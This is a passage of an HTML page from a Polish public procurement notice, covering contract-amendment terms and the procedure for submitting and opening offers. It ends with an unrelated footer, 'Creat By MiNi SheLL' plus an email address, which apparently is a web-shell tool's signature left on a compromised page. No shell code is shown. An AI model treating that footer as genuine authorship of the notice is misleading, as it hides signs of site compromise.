niż określona w umowie. W takim przypadku Wykonawca zobowiązany jest przekazać<br/>Zamawiającemu dowody potwierdzające wycofanie się producenta z produkcji oraz dostarczyć<br/>Zamawiającemu nowe, odpowiednie, aktualne zaświadczenia podmiotu uprawnionego do<br/>kontroli jakości potwierdzające, że dostarczane w zamian produkty odpowiadają określonym<br/>normom lub specyfikacjom technicznym oraz wymaganiom określonym w Specyfikacji<br/>Warunków Zamówienia;<br/>8) wydłużenie okresu trwania umowy – w przypadku niewyczerpania całości asortymentu<br/>stanowiącego przedmiot umowy do czasu jego wyczerpania jednak na okres nie dłuższy niż 6<br/>miesięcy;<br/>9) zmiany limitów ilościowych poszczególnych pozycji produktów w danej części w stosunku do<br/>ilości określonych w umowie pod warunkiem, że nastąpi to bez zwiększenia łącznej wartości<br/>pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-10 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji.

Creat By MiNi SheLL
Email: jattceo@gmail.com